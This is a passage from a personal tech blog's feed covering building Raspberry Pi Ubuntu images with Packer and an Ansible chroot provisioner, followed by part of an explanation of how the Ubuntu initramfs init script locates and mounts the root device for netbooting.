</span></span><span style="display:flex;"><span>hn_netboot <span style="color:#f92672">=</span> <span style="color:#66d9ef">true</span>
</span></span><span style="display:flex;"><span>hn_host_id <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;abcdef123&#34;</span>
</span></span></code></pre></div><p>They can be passed to a Packer invocation with the <code>-var-file</code> flag:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-bash" data-lang="bash"><span style="display:flex;"><span>packer build -var-file<span style="color:#f92672">=</span>./foobar.pkrvars.hcl
</span></span></code></pre></div><p>So a full run of Packer with the above variable file in <code>./mypi.pkrvars.hcl</code>
and the Packer template in <code>./pi.pkr.hcl</code> would look like this:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-bash" data-lang="bash"><span style="display:flex;"><span>packer build -var-file<span style="color:#f92672">=</span>./mypi.pkrvars.hcl ./pi.pkr.hcl
</span></span></code></pre></div><h2 id="the-source-definition">The source definition</h2>
<p>Next comes the definition of the image source. This definition largely depends
on the builder being used, in this case <em>packer-builder-arm</em>:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-hcl" data-lang="hcl"><span style="display:flex;"><span><span style="color:#66d9ef">source</span> <span style="color:#e6db74">&#34;arm&#34; &#34;ubuntu&#34;</span> {
</span></span><span style="display:flex;"><span>  file_urls <span style="color:#f92672">=</span> [<span style="color:#e6db74">&#34;https://cdimage.ubuntu.com/ubuntu/releases/22.04/release/ubuntu-22.04-preinstalled-server-arm64+raspi.img.xz&#34;</span>]
</span></span><span style="display:flex;"><span>  file_checksum_url <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;https://cdimage.ubuntu.com/ubuntu/releases/22.04/release/SHA256SUMS&#34;</span>
</span></span><span style="display:flex;"><span>  file_checksum_type <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;sha256&#34;</span>
</span></span><span style="display:flex;"><span>  file_target_extension <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;xz&#34;</span>
</span></span><span style="display:flex;"><span>  file_unarchive_cmd <span style="color:#f92672">=</span> [<span style="color:#e6db74">&#34;xz&#34;, &#34;-T0&#34;, &#34;--decompress&#34;, &#34;$ARCHIVE_PATH&#34;</span>]
</span></span><span style="display:flex;"><span>  image_mount_path <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;${local.mountpath}&#34;</span>
</span></span><span style="display:flex;"><span>  image_build_method <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;reuse&#34;</span>
</span></span><span style="display:flex;"><span>  image_path <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;${var.hn_hostname}.img&#34;</span>
</span></span><span style="display:flex;"><span>  image_size <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;2.3G&#34;</span>
</span></span><span style="display:flex;"><span>  image_type <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;dos&#34;</span>
</span></span><span style="display:flex;"><span>  <span style="color:#66d9ef">image_partitions</span> {
</span></span><span style="display:flex;"><span>    name <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;boot&#34;</span>
</span></span><span style="display:flex;"><span>    type <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;c&#34;</span>
</span></span><span style="display:flex;"><span>    start_sector <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;2048&#34;</span>
</span></span><span style="display:flex;"><span>    filesystem <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;fat&#34;</span>
</span></span><span style="display:flex;"><span>    size <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;256M&#34;</span>
</span></span><span style="display:flex;"><span>    mountpoint <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;/boot/firmware&#34;</span>
</span></span><span style="display:flex;"><span>  }
</span></span><span style="display:flex;"><span>  <span style="color:#66d9ef">image_partitions</span> {
</span></span><span style="display:flex;"><span>    name <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;root&#34;</span>
</span></span><span style="display:flex;"><span>    type <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;83&#34;</span>
</span></span><span style="display:flex;"><span>    start_sector <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;526336&#34;</span>
</span></span><span style="display:flex;"><span>    filesystem <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;ext4&#34;</span>
</span></span><span style="display:flex;"><span>    size <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;3.4G&#34;</span>
</span></span><span style="display:flex;"><span>    mountpoint <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;/&#34;</span>
</span></span><span style="display:flex;"><span>  }
</span></span><span style="display:flex;"><span>  image_chroot_env <span style="color:#f92672">=</span> [&#34;PATH<span style="color:#f92672">=</span><span style="color:#960050;background-color:#1e0010">/</span><span style="color:#66d9ef">usr</span><span style="color:#960050;background-color:#1e0010">/</span><span style="color:#66d9ef">local</span><span style="color:#960050;background-color:#1e0010">/</span><span style="color:#66d9ef">bin</span><span style="color:#960050;background-color:#1e0010">:/</span><span style="color:#66d9ef">usr</span><span style="color:#960050;background-color:#1e0010">/</span><span style="color:#66d9ef">local</span><span style="color:#960050;background-color:#1e0010">/</span><span style="color:#66d9ef">sbin</span><span style="color:#960050;background-color:#1e0010">:/</span><span style="color:#66d9ef">usr</span><span style="color:#960050;background-color:#1e0010">/</span><span style="color:#66d9ef">bin</span><span style="color:#960050;background-color:#1e0010">:/</span><span style="color:#66d9ef">usr</span><span style="color:#960050;background-color:#1e0010">/</span><span style="color:#66d9ef">sbin</span><span style="color:#960050;background-color:#1e0010">:/</span><span style="color:#66d9ef">bin</span><span style="color:#960050;background-color:#1e0010">:/</span><span style="color:#66d9ef">sbin</span><span style="color:#960050;background-color:#1e0010">&#34;</span>]
</span></span><span style="display:flex;"><span>  qemu_binary_source_path <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;/usr/bin/qemu-aarch64&#34;</span>
</span></span><span style="display:flex;"><span>  qemu_binary_destination_path <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;/usr/bin/qemu-aarch64&#34;</span>
</span></span><span style="display:flex;"><span>}
</span></span></code></pre></div><p>Here, most things are self-explanatory. I&rsquo;m using Ubuntu&rsquo;s most recent 22.04
Raspberry Pi image as the base for my images. One notable option is <code>image_mount_path</code>.
If left undefined, it defaults to a random subdirectory in <code>/tmp</code>.
That default won&rsquo;t do here, because the Ansible provisioner later needs to
know the exact mount directory.</p>
<p>Also important are the <code>image_partitions</code> definitions. These describe what
partitions Packer can expect to find. To figure out the exact values,
the following command can be used on the future source image:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-bash" data-lang="bash"><span style="display:flex;"><span>fdisk -l &lt;IMAGE&gt;
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>Disk 9e458e3cbbfebfb2e8c0d717665bc43e1c29f286: 3.79 GiB, <span style="color:#ae81ff">4068480000</span> bytes, <span style="color:#ae81ff">7946250</span> sectors
</span></span><span style="display:flex;"><span>Units: sectors of <span style="color:#ae81ff">1</span> * 512 <span style="color:#f92672">=</span> <span style="color:#ae81ff">512</span> bytes
</span></span><span style="display:flex;"><span>Sector size <span style="color:#f92672">(</span>logical/physical<span style="color:#f92672">)</span>: <span style="color:#ae81ff">512</span> bytes / <span style="color:#ae81ff">512</span> bytes
</span></span><span style="display:flex;"><span>I/O size <span style="color:#f92672">(</span>minimum/optimal<span style="color:#f92672">)</span>: <span style="color:#ae81ff">512</span> bytes / <span style="color:#ae81ff">512</span> bytes
</span></span><span style="display:flex;"><span>Disklabel type: dos
</span></span><span style="display:flex;"><span>Disk identifier: 0xdeca7dfc
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>Device                                     Boot  Start     End Sectors  Size Id Type
</span></span><span style="display:flex;"><span>9e458e3cbbfebfb2e8c0d717665bc43e1c29f286p1 *      <span style="color:#ae81ff">2048</span>  <span style="color:#ae81ff">526335</span>  <span style="color:#ae81ff">524288</span>  256M  c W95 FAT32 <span style="color:#f92672">(</span>LBA<span style="color:#f92672">)</span>
</span></span><span style="display:flex;"><span>9e458e3cbbfebfb2e8c0d717665bc43e1c29f286p2      <span style="color:#ae81ff">526336</span> <span style="color:#ae81ff">7946215</span> <span style="color:#ae81ff">7419880</span>  3.5G <span style="color:#ae81ff">83</span> Linux
</span></span></code></pre></div><p>That command shows all necessary information to correctly fill out the
<code>image_partitions</code> entries in the template.</p>
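<p>As a quick sanity check, the partition sizes can be derived from the sector counts in the
<code>fdisk</code> output (512-byte sectors). A small worked example:</p>
<pre tabindex="0"><code># Boot partition: sectors 2048..526335 = 524288 sectors * 512 bytes
echo $(( 524288 * 512 / 1024 / 1024 ))M   # prints 256M
# Root partition: 7419880 sectors * 512 bytes
echo $(( 7419880 * 512 / 1024 / 1024 ))M  # prints 3622M, just under 3.5G
</code></pre>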
<p>Finally, there are the Qemu/chroot config options. The most important one is
<code>qemu_binary_source_path</code>. This path points to the static QEMU binary that
<code>binfmt_misc</code> uses to run aarch64 executables. Because the packer-builder-arm
plugin provisions inside a chroot, that binary also needs to be available inside
the chroot.</p>
<p>Here comes one of the few problems with this image creation setup: this config
option makes the Packer template non-portable, because the <code>qemu-aarch64</code> binary
not only resides in different places on different distros, but may also have different
names. For example, on my main Gentoo desktop, the binary is located at the path indicated
in the config, <code>/usr/bin/qemu-aarch64</code>, while on a Debian based machine the file
resides at <code>/usr/libexec/qemu-binfmt/aarch64-binfmt-P</code>.</p>
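<p>One way to find the right path on a given machine is to look at the <code>binfmt_misc</code>
registrations directly. The registration name varies between distros, so take this as a sketch
rather than a recipe:</p>
<pre tabindex="0"><code># Show which interpreter binfmt_misc uses for each registered format
grep -H interpreter /proc/sys/fs/binfmt_misc/* 2&gt;/dev/null
# Possible output (name and path will differ per distro):
#   /proc/sys/fs/binfmt_misc/qemu-aarch64:interpreter /usr/bin/qemu-aarch64
</code></pre>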
<h2 id="provisioning">Provisioning</h2>
<p>Finally, we come to the build/provisioning part. Here, I use the previously
defined source and run Ansible on the mounted image via packer-builder-arm&rsquo;s
chroot mechanism.</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-hcl" data-lang="hcl"><span style="display:flex;"><span><span style="color:#66d9ef">build</span> {
</span></span><span style="display:flex;"><span>  sources <span style="color:#f92672">=</span> [<span style="color:#e6db74">&#34;source.arm.ubuntu&#34;</span>]
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>  <span style="color:#66d9ef">provisioner</span> <span style="color:#e6db74">&#34;ansible&#34;</span> {
</span></span><span style="display:flex;"><span>    extra_arguments <span style="color:#f92672">=</span> [
</span></span><span style="display:flex;"><span>      &#34;--connection<span style="color:#f92672">=</span><span style="color:#66d9ef">chroot</span><span style="color:#960050;background-color:#1e0010">&#34;</span>,
</span></span><span style="display:flex;"><span>      &#34;--inventory-file<span style="color:#f92672">=</span><span style="color:#e6db74">${</span><span style="color:#960050;background-color:#1e0010">local</span>.<span style="color:#960050;background-color:#1e0010">mountpath</span><span style="color:#e6db74">}</span>,<span style="color:#960050;background-color:#1e0010">&#34;</span>,
</span></span><span style="display:flex;"><span>      &#34;--limit<span style="color:#f92672">=</span><span style="color:#e6db74">${</span><span style="color:#960050;background-color:#1e0010">local</span>.<span style="color:#960050;background-color:#1e0010">mountpath</span><span style="color:#e6db74">}</span><span style="color:#960050;background-color:#1e0010">&#34;</span>,
</span></span><span style="display:flex;"><span>      &#34;--extra-vars&#34;, &#34;imhotep_pw<span style="color:#f92672">=</span><span style="color:#e6db74">${</span><span style="color:#960050;background-color:#1e0010">local</span>.<span style="color:#960050;background-color:#1e0010">foobar-pw</span><span style="color:#e6db74">}</span><span style="color:#960050;background-color:#1e0010">&#34;</span>,
</span></span><span style="display:flex;"><span>      &#34;--extra-vars&#34;, &#34;hn_hostname<span style="color:#f92672">=</span><span style="color:#e6db74">${</span><span style="color:#960050;background-color:#1e0010">var</span>.<span style="color:#960050;background-color:#1e0010">hn_hostname</span><span style="color:#e6db74">}</span><span style="color:#960050;background-color:#1e0010">&#34;</span>,
</span></span><span style="display:flex;"><span>      &#34;--extra-vars&#34;, &#34;hn_netboot<span style="color:#f92672">=</span><span style="color:#e6db74">${</span><span style="color:#960050;background-color:#1e0010">var</span>.<span style="color:#960050;background-color:#1e0010">hn_netboot</span><span style="color:#e6db74">}</span><span style="color:#960050;background-color:#1e0010">&#34;</span>,
</span></span><span style="display:flex;"><span>      &#34;--extra-vars&#34;, &#34;hn_host_id<span style="color:#f92672">=</span><span style="color:#e6db74">${</span><span style="color:#960050;background-color:#1e0010">var</span>.<span style="color:#960050;background-color:#1e0010">hn_host_id</span><span style="color:#e6db74">}</span><span style="color:#960050;background-color:#1e0010">&#34;</span>,
</span></span><span style="display:flex;"><span>      &#34;--extra-vars&#34;, &#34;hn_ceph_key<span style="color:#f92672">=</span><span style="color:#e6db74">${</span><span style="color:#960050;background-color:#1e0010">local</span>.<span style="color:#960050;background-color:#1e0010">hn_ceph_key</span><span style="color:#e6db74">}</span><span style="color:#960050;background-color:#1e0010">&#34;</span>,
</span></span><span style="display:flex;"><span>      &#34;--extra-vars&#34;, &#34;hn_pi<span style="color:#f92672">=</span><span style="color:#66d9ef">true</span><span style="color:#960050;background-color:#1e0010">&#34;</span>,
</span></span><span style="display:flex;"><span>      <span style="color:#e6db74">&#34;--user&#34;, &#34;ubuntu&#34;</span>,
</span></span><span style="display:flex;"><span>    ]
</span></span><span style="display:flex;"><span>    playbook_file <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;${path.root}/../bootstrap-ubuntu-image.yml&#34;</span>
</span></span><span style="display:flex;"><span>  }
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>}
</span></span></code></pre></div><p>The documentation of the Ansible provisioner can be found <a href="https://www.packer.io/plugins/provisioners/ansible/ansible">here</a>.</p>
<p>The <em>provisioner</em> block is where Packer actually makes changes to
the source image. In this case, Ansible is run against the image, using the
playbook indicated in the <code>playbook_file</code> entry. The <code>${path.root}</code> variable
always contains the directory where the template file lives.</p>
<p>Next comes the <code>--connection</code> Ansible parameter. This needs
to be set to <code>chroot</code>, because we&rsquo;re only chrooting into the image, not launching
an entire VM that could run SSH.</p>
<p>Related to the connection is the <code>inventory-file</code> parameter for Ansible.
Ansible always needs to operate against an inventory of hosts, and this inventory
is automatically provided by Packer. The same goes for the <code>limit</code> option, which
also uses the provided inventory.</p>
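<p>To make a bit clearer what Packer assembles from all of this, the equivalent manual
invocation would look roughly like the following. The mount path and variable values are
placeholders; the trailing comma turns the path into a literal one-host inventory:</p>
<pre tabindex="0"><code># Rough manual equivalent of what Packer runs (sketch, placeholder paths)
ansible-playbook \
  --connection=chroot \
  --inventory /tmp/packer-1234, \
  --limit /tmp/packer-1234 \
  --extra-vars &#34;hn_hostname=mypi hn_netboot=true&#34; \
  bootstrap-ubuntu-image.yml
</code></pre>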
<p>Next, all of the input and local variables are forwarded to the Ansible playbook.
The only interesting part here is the <code>hn_pi=true</code> variable. This is necessary
in my setup because the <code>bootstrap-ubuntu-image.yml</code> file is used not only for
Pi hosts but also for other Ubuntu hosts (more on doing a full Ubuntu install with Packer
and Qemu in a later post), yet it still has to do a couple of Raspberry Pi
specific things.</p>
<h2 id="the-ansible-playbook">The Ansible playbook</h2>
<p>Alright, I have just realized that this article is already pretty long. I think
the Ansible playbook deserves its own article, coming soon.</p>
]]></content:encoded>
    </item>
    <item>
      <title>Netboot Raspberry Pi Part III: Telling Linux Where to Boot From</title>
      <link>https://blog.mei-home.net/posts/rpi-netboot/initramfs/</link>
      <pubDate>Thu, 18 Aug 2022 22:58:12 +0200</pubDate>
      <guid>https://blog.mei-home.net/posts/rpi-netboot/initramfs/</guid>
      <description>Explanation of how Linux early boot is not magic</description>
      <content:encoded><![CDATA[<p>This is the third part of my Pi netboot series. You can find an overview and
links to the other parts in the <a href="https://blog.mei-home.net/posts/rpi-netboot/intro/">Pi netboot series overview article</a>.</p>
<p>This, to me, is the most interesting article of the entire netboot Pi
series. When I started setting up netbooting, I had no idea how it would work.
I had a vague idea that there was a kernel command line parameter, but no idea
where it was interpreted.
Now, I know that the early boot and the <em>initramfs</em> are not voodoo magic, but
just that most mundane of Linux tech: Shell scripts. &#x1f605;
That was another magic Linux moment for me: Huh, it&rsquo;s really that simple?</p>
<p>Special thanks for pretty much this entire article go to the GitHub user
<a href="https://github.com/trickkiste">trickkiste</a>, who showed
how to add support for netbooting from a Ceph RBD volume in <a href="https://github.com/ltsp/ltsp/pull/50">this unmerged PR</a>.
The code I will show later is based on that PR, adapted a bit for booting Ubuntu
on a Pi 4.</p>
<p>The goal of this article is to show you how to get Ubuntu (any Linux, really) to
boot from anything other than a local disk. It is applicable both to
a completely diskless machine doing a PXE netboot and to machines
like a Pi which use their SD card for the boot partition but store the root
partition somewhere else.
The post will also not be Pi specific, because at this point we are out of the
arcane Pi boot process and everything is just vanilla Linux.</p>
<p><strong>Please note:</strong> All command examples and code in this post will concentrate
on <em>initramfs</em>, not <em>initrd</em>. While all the concepts are the same, the commands
required to handle them are different.
In addition, as I&rsquo;m using Ubuntu for my Pis, this will serve as the example
system, but other Linux distributions probably have very similar looking scripts.</p>
<h1 id="what-does-the-initramfs-do">What does the initramfs do?</h1>
<p>In the words of the <a href="https://www.kernel.org/doc/Documentation/filesystems/ramfs-rootfs-initramfs.txt">kernel docs on the topic</a>:</p>
<blockquote>
<p>All 2.6 Linux kernels contain a gzipped &ldquo;cpio&rdquo; format archive, which is
extracted into rootfs when the kernel boots up.  After extracting, the kernel
checks to see if rootfs contains a file &ldquo;init&rdquo;, and if so it executes it as PID 1.
If found, this init process is responsible for bringing the system the
rest of the way up, including locating and mounting the real root device (if
any).</p></blockquote>
<p>So in principle, the main use of the initramfs is to provide an environment for
finding and mounting the root partition with a bit more tooling than the kernel
itself has. It also looks like it was introduced as an early userspace to
implement some special cases (e.g. NFS mounting or loading additional kernel
modules) without having to implement all of them directly into the kernel,
keeping both the code and the resulting image smaller.</p>
<p>In most implementations, the initramfs contains <a href="https://busybox.net/">BusyBox</a>
tooling and a simple shell. On Ubuntu, that&rsquo;s <code>ash</code>.</p>
<p>And this is exactly what we need: An environment in which we can mount a Ceph
RBD volume as the root disk.</p>
<h1 id="basic-initramfs-tools-scripting">Basic initramfs-tools scripting</h1>
<p>So what does the basic scripting look like? How does it work? I will explain
what&rsquo;s going on under the hood using the Ubuntu variant of the <code>initramfs-tools</code>
package. This package is used on a number of distributions to make changing
initramfs scripting a bit easier. My explanations will apply to both Debian
and Ubuntu, and should also be useful for other distributions.</p>
<p>The scripting used in the initramfs can be found in <code>/usr/share/initramfs-tools/</code>.</p>
<p>As described above, the initramfs scripting is loaded by the kernel as the
<code>init</code> process with PID 1. This is done by executing the file <code>init</code> at the
root of the initramfs. This is a simple shell script, so everybody can read
it. This was a really nice discovery for me, because it means I can go
through it and understand what happens, and also adapt it easily.</p>
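<p>If you want to follow along on your own machine, the initramfs-tools package ships tools to
list and unpack the currently installed initramfs. The exact image path and the layout of the
unpacked tree may differ, so treat this as a sketch:</p>
<pre tabindex="0"><code># List the contents of the installed initramfs (Ubuntu/Debian)
lsinitramfs /boot/initrd.img-$(uname -r) | less

# Or unpack it and read the init script directly
mkdir /tmp/initramfs
unmkinitramfs /boot/initrd.img-$(uname -r) /tmp/initramfs
less /tmp/initramfs/main/init   # on some systems the tree has no main/ subdirectory
</code></pre>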
<p>Let&rsquo;s start at the end. Being called as the <code>init</code> process by the kernel
means that at some point, after the root disk is found and mounted, the initramfs
<code>init</code> script needs to invoke the actual <code>init</code> program of the distribution.
These days, that&rsquo;s going to be <code>systemd</code> in most cases.
And sure enough, that&rsquo;s what we see at the end of the script:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-shell" data-lang="shell"><span style="display:flex;"><span>exec run-init <span style="color:#e6db74">${</span>drop_caps<span style="color:#e6db74">}</span> <span style="color:#e6db74">&#34;</span><span style="color:#e6db74">${</span>rootmnt<span style="color:#e6db74">}</span><span style="color:#e6db74">&#34;</span> <span style="color:#e6db74">&#34;</span><span style="color:#e6db74">${</span>init<span style="color:#e6db74">}</span><span style="color:#e6db74">&#34;</span> <span style="color:#e6db74">&#34;</span>$@<span style="color:#e6db74">&#34;</span> &lt;<span style="color:#e6db74">&#34;</span><span style="color:#e6db74">${</span>rootmnt<span style="color:#e6db74">}</span><span style="color:#e6db74">/dev/console&#34;</span> &gt;<span style="color:#e6db74">&#34;</span><span style="color:#e6db74">${</span>rootmnt<span style="color:#e6db74">}</span><span style="color:#e6db74">/dev/console&#34;</span> 2&gt;&amp;<span style="color:#ae81ff">1</span>
</span></span></code></pre></div><p>The <code>run-init</code> program which it execs into is a small klibc helper which
runs the actual init program.
The source can be found <a href="https://git.kernel.org/pub/scm/libs/klibc/klibc.git/tree/usr/kinit/run-init/run-init.c">here</a>.</p>
<p>The source code comment describes what it does:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-c" data-lang="c"><span style="display:flex;"><span><span style="color:#75715e">/*
</span></span></span><span style="display:flex;"><span><span style="color:#75715e">* 1. Delete all files in the initramfs;
</span></span></span><span style="display:flex;"><span><span style="color:#75715e">* 2. Remounts /real-root onto the root filesystem;
</span></span></span><span style="display:flex;"><span><span style="color:#75715e">* 3. Drops comma-separated list of capabilities;
</span></span></span><span style="display:flex;"><span><span style="color:#75715e">* 4. Chroots;
</span></span></span><span style="display:flex;"><span><span style="color:#75715e">* 5. Opens /dev/console;
</span></span></span><span style="display:flex;"><span><span style="color:#75715e">* 6. Spawns the specified init program (with arguments.)
</span></span></span><span style="display:flex;"><span><span style="color:#75715e">*
</span></span></span><span style="display:flex;"><span><span style="color:#75715e">* With the -p option, it skips step 1 in order to allow the initramfs to
</span></span></span><span style="display:flex;"><span><span style="color:#75715e">* be persisted into the running system.
</span></span></span><span style="display:flex;"><span><span style="color:#75715e">*
</span></span></span><span style="display:flex;"><span><span style="color:#75715e">* With the -n option, it skips steps 1, 2 and 6 and can be used to check
</span></span></span><span style="display:flex;"><span><span style="color:#75715e">* whether the given root and init are likely to work.
</span></span></span><span style="display:flex;"><span><span style="color:#75715e">*/</span>
</span></span></code></pre></div><p>The <code>init</code> variable that is handed into <code>run-init</code> is just <code>/sbin/init</code> on a
typical Ubuntu system, which in turn is a symlink pointing to <code>/lib/systemd/systemd</code>.</p>
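<p>This is easy to verify on a running system, assuming a systemd-based distro:</p>
<pre tabindex="0"><code># Resolve the /sbin/init symlink; the target path may differ per distro
readlink -f /sbin/init
# e.g. /lib/systemd/systemd
</code></pre>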
<p>The first relevant thing the <code>init</code> script does is to parse the command line
parameters. These are taken from the kernel command line, which can always
be found in <code>/proc/cmdline</code>. The code partially looks like this, with a few
uninteresting parameters filtered out:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-shell" data-lang="shell"><span style="display:flex;"><span><span style="color:#66d9ef">for</span> x in <span style="color:#66d9ef">$(</span>cat /proc/cmdline<span style="color:#66d9ef">)</span>; <span style="color:#66d9ef">do</span>
</span></span><span style="display:flex;"><span>	<span style="color:#66d9ef">case</span> $x in
</span></span><span style="display:flex;"><span>	root<span style="color:#f92672">=</span>*<span style="color:#f92672">)</span>
</span></span><span style="display:flex;"><span>		ROOT<span style="color:#f92672">=</span><span style="color:#e6db74">${</span>x#root=<span style="color:#e6db74">}</span>
</span></span><span style="display:flex;"><span>		<span style="color:#66d9ef">if</span> <span style="color:#f92672">[</span> -z <span style="color:#e6db74">&#34;</span><span style="color:#e6db74">${</span>BOOT<span style="color:#e6db74">}</span><span style="color:#e6db74">&#34;</span> <span style="color:#f92672">]</span> <span style="color:#f92672">&amp;&amp;</span> <span style="color:#f92672">[</span> <span style="color:#e6db74">&#34;</span>$ROOT<span style="color:#e6db74">&#34;</span> <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;/dev/nfs&#34;</span> <span style="color:#f92672">]</span>; <span style="color:#66d9ef">then</span>
</span></span><span style="display:flex;"><span>			BOOT<span style="color:#f92672">=</span>nfs
</span></span><span style="display:flex;"><span>		<span style="color:#66d9ef">fi</span>
</span></span><span style="display:flex;"><span>		;;
</span></span><span style="display:flex;"><span>	nfsroot<span style="color:#f92672">=</span>*<span style="color:#f92672">)</span>
</span></span><span style="display:flex;"><span>		<span style="color:#75715e"># shellcheck disable=SC2034</span>
</span></span><span style="display:flex;"><span>		NFSROOT<span style="color:#f92672">=</span><span style="color:#e6db74">&#34;</span><span style="color:#e6db74">${</span>x#nfsroot=<span style="color:#e6db74">}</span><span style="color:#e6db74">&#34;</span>
</span></span><span style="display:flex;"><span>		;;
</span></span><span style="display:flex;"><span>	boot<span style="color:#f92672">=</span>*<span style="color:#f92672">)</span>
</span></span><span style="display:flex;"><span>		BOOT<span style="color:#f92672">=</span><span style="color:#e6db74">${</span>x#boot=<span style="color:#e6db74">}</span>
</span></span><span style="display:flex;"><span>		;;
</span></span><span style="display:flex;"><span>	debug<span style="color:#f92672">)</span>
</span></span><span style="display:flex;"><span>		debug<span style="color:#f92672">=</span>y
</span></span><span style="display:flex;"><span>		quiet<span style="color:#f92672">=</span>n
</span></span><span style="display:flex;"><span>		<span style="color:#66d9ef">if</span> <span style="color:#f92672">[</span> -n <span style="color:#e6db74">&#34;</span><span style="color:#e6db74">${</span>netconsole<span style="color:#e6db74">}</span><span style="color:#e6db74">&#34;</span> <span style="color:#f92672">]</span>; <span style="color:#66d9ef">then</span>
</span></span><span style="display:flex;"><span>			log_output<span style="color:#f92672">=</span>/dev/kmsg
</span></span><span style="display:flex;"><span>		<span style="color:#66d9ef">else</span>
</span></span><span style="display:flex;"><span>			log_output<span style="color:#f92672">=</span>/run/initramfs/initramfs.debug
</span></span><span style="display:flex;"><span>		<span style="color:#66d9ef">fi</span>
</span></span><span style="display:flex;"><span>		set -x
</span></span><span style="display:flex;"><span>		;;
</span></span><span style="display:flex;"><span>	netconsole<span style="color:#f92672">=</span>*<span style="color:#f92672">)</span>
</span></span><span style="display:flex;"><span>		netconsole<span style="color:#f92672">=</span><span style="color:#e6db74">${</span>x#netconsole=<span style="color:#e6db74">}</span>
</span></span><span style="display:flex;"><span>		<span style="color:#f92672">[</span> <span style="color:#e6db74">&#34;</span>$debug<span style="color:#e6db74">&#34;</span> <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;y&#34;</span> <span style="color:#f92672">]</span> <span style="color:#f92672">&amp;&amp;</span> log_output<span style="color:#f92672">=</span>/dev/kmsg
</span></span><span style="display:flex;"><span>		;;
</span></span><span style="display:flex;"><span>	<span style="color:#66d9ef">esac</span>
</span></span><span style="display:flex;"><span><span style="color:#66d9ef">done</span>
</span></span></code></pre></div><p>The <code>root</code> and <code>nfsroot</code> options provide the root disk/device to mount.
The <code>boot</code> option and the <code>BOOT</code> environment variable will become important
later, because the content of that variable determines which script initramfs
uses to mount the root device.</p>
<p>The <code>debug</code> and <code>netconsole</code> options are interesting for debugging, especially
in a netboot scenario where you don&rsquo;t necessarily have the option of attaching
a screen to your host.</p>
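<p>In practice, that means you can append <code>debug</code> to the kernel command line (on a Pi
that is <code>cmdline.txt</code> on the boot partition) and read the trace after the system comes
up, using the log path from the script above:</p>
<pre tabindex="0"><code># After booting with &#34;debug&#34; on the kernel command line:
less /run/initramfs/initramfs.debug
</code></pre>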
<p>The next interesting part of the script loads any additional kernel modules
before the mount process for the root disk starts:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-shell" data-lang="shell"><span style="display:flex;"><span><span style="color:#f92672">[</span> <span style="color:#e6db74">&#34;</span>$quiet<span style="color:#e6db74">&#34;</span> !<span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;y&#34;</span> <span style="color:#f92672">]</span> <span style="color:#f92672">&amp;&amp;</span> log_begin_msg <span style="color:#e6db74">&#34;Loading essential drivers&#34;</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">[</span> -n <span style="color:#e6db74">&#34;</span><span style="color:#e6db74">${</span>netconsole<span style="color:#e6db74">}</span><span style="color:#e6db74">&#34;</span> <span style="color:#f92672">]</span> <span style="color:#f92672">&amp;&amp;</span> modprobe netconsole netconsole<span style="color:#f92672">=</span><span style="color:#e6db74">&#34;</span><span style="color:#e6db74">${</span>netconsole<span style="color:#e6db74">}</span><span style="color:#e6db74">&#34;</span>
</span></span><span style="display:flex;"><span>load_modules
</span></span><span style="display:flex;"><span><span style="color:#f92672">[</span> <span style="color:#e6db74">&#34;</span>$quiet<span style="color:#e6db74">&#34;</span> !<span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;y&#34;</span> <span style="color:#f92672">]</span> <span style="color:#f92672">&amp;&amp;</span> log_end_msg
</span></span></code></pre></div><p>The <code>load_modules</code> function looks into the <code>/conf/modules</code> file and runs <code>modprobe</code>
on each line which is not a comment. The contents of <code>/conf/modules</code>
are taken from <code>/etc/initramfs-tools/modules</code> when the initramfs is created.</p>
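<p>So if a boot method needs extra kernel modules early on, they go into
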